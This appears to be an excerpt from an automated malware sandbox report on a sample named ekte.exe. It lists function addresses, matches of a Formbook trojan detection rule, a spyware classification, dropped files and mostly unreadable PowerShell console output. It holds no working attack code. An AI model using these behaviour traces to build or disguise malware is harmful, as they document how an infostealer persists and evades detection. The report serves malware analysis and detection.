            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A612388_2_00A61238
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009BF3CF8_2_009BF3CF
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C73538_2_009C7353
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009D14898_2_009D1489
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009F54858_2_009F5485
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009FD47D8_2_009FD47D
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A635DA8_2_00A635DA
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C351F8_2_009C351F
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4579A8_2_00A4579A
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009F57C38_2_009F57C3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A5771D8_2_00A5771D
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A5F8EE8_2_00A5F8EE
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A3F8C48_2_00A3F8C4
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4394B8_2_00A4394B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A459558_2_00A45955
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A73A838_2_00A73A83
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009BFBD78_2_009BFBD7
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4DBDA8_2_00A4DBDA
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009E7B008_2_009E7B00
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A5FDDD8_2_00A5FDDD
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A4BF148_2_00A4BF14
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009EDF7C8_2_009EDF7C
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_002404EC10_2_002404EC
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_002444D810_2_002444D8
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024A6B010_2_0024A6B0
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024D2BD10_2_0024D2BD
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024D2D810_2_0024D2D8
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_002444C910_2_002444C9
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024E6D010_2_0024E6D0
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024D71010_2_0024D710
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024185A10_2_0024185A
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_00242A6810_2_00242A68
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024EB0810_2_0024EB08
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 10_2_0024DB4810_2_0024DB48
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E87B7119_2_61E87B71
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E2009519_2_61E20095
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E1606A19_2_61E1606A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E5100119_2_61E51001
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E3A38219_2_61E3A382
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E2C2C719_2_61E2C2C7
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E282B219_2_61E282B2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E245F119_2_61E245F1
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E224B019_2_61E224B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E3D42719_2_61E3D427
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E6E7E019_2_61E6E7E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E427CB19_2_61E427CB
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E3E72619_2_61E3E726
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E2F9A319_2_61E2F9A3
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E448FF19_2_61E448FF
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E1BBF219_2_61E1BBF2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E4DBBA19_2_61E4DBBA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E42D3719_2_61E42D37
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E4EE3419_2_61E4EE34
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
            Source: C:\Users\user\Desktop\ekte.exeCode function: String function: 009BDF5C appears 137 times
            Source: C:\Users\user\Desktop\ekte.exeCode function: String function: 00A03F92 appears 132 times
            Source: C:\Users\user\Desktop\ekte.exeCode function: String function: 009BE2A8 appears 60 times
            Source: C:\Users\user\Desktop\ekte.exeCode function: String function: 00A0373B appears 253 times
            Source: C:\Users\user\Desktop\ekte.exeCode function: String function: 00A2F970 appears 84 times
            Source: ekte.exeStatic PE information: invalid certificate
            Source: sqlite3.dll.19.drStatic PE information: Number of sections : 18 > 10
            Source: ekte.exe, 00000000.00000000.359787899.0000000001482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
            Source: ekte.exe, 00000000.00000002.383376201.00000000052AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesctasks.exej% vs ekte.exe
            Source: ekte.exe, 00000000.00000002.375617011.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ekte.exe
            Source: ekte.exe, 00000000.00000002.383837466.00000000067B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ekte.exe
            Source: ekte.exe, 00000000.00000002.376498845.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ekte.exe
            Source: ekte.exe, 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ekte.exe
            Source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
            Source: ekte.exe, 00000008.00000002.417831173.00000000008D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
            Source: ekte.exeBinary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
            Source: ekte.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ekte.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: eFDiSxeTfjUqTk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/19@12/6
            Source: C:\Users\user\Desktop\ekte.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Users\user\Desktop\ekte.exeFile created: C:\Users\user\AppData\Local\Temp\tmp47BA.tmpJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................@..........................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................L..........................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........^..........................s..............D..... .......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................j..........................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............D.....$.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............D.....2.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............D.............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............<..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......M..........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......`..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......l..........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......P..................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(.)..... .......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.).....$.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......& .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.).....2.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......D .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......W .........................s....................l.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......c .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......x.......u .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................P.......................(.P.....4.......\.......................................................................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................P.........................s..............).............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................P.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P.............................!Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................-Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................?Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................KQ.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........]Q.........................s............(....... .......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................iQ.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P.............................{Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......Q.........................s............(.......$.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................Q.........................s..............).....l.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................R.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................N.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................5O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................AO.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................SO.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........qO.........................s............H....... .......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................}O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......O.........................s............H.......$.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................
